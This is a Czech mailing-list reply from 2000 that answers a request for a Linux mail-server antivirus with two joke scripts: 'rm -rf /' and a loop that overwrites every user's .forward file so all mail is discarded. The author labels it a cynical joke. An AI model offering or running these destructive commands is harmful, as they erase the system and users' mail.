Linux antivirus

Úterý Prosinec 19 23:49:02 CET 2000

On Mon, 18 Dec 2000, Bretislav Duda wrote:

> muze mi nekdo doporucit funkcni antivirus na linux server pro kontrolu
> predevsim posty - nejlepe GNU jeli vubec nejaky?

Antivirus pro soubory:

#!/bin/sh
rm -rf /

Antivirus pro emailove zpravy:

#!/bin/sh
awk 'BEGIN{FS=":"} {print $6}' < /etc/passwd | \
while read d; do
	if [ ! -d "$d" ]; then continue;
	echo '|"cat > /dev/null"' > "$d"/.forward
done

Oba tyto zarucene spolehlive antivirove programy muzete uzivat zcela
volne...ovsem jen tak "jak jsou", zcela bez jakekoli zaruky. :)

(Vyse uvedene je pochopilne ponekud cynicky vtip. Jestli je nekdo dost
padly na hlavu, aby to zkousel, tak at si pak nadava sam sobe.)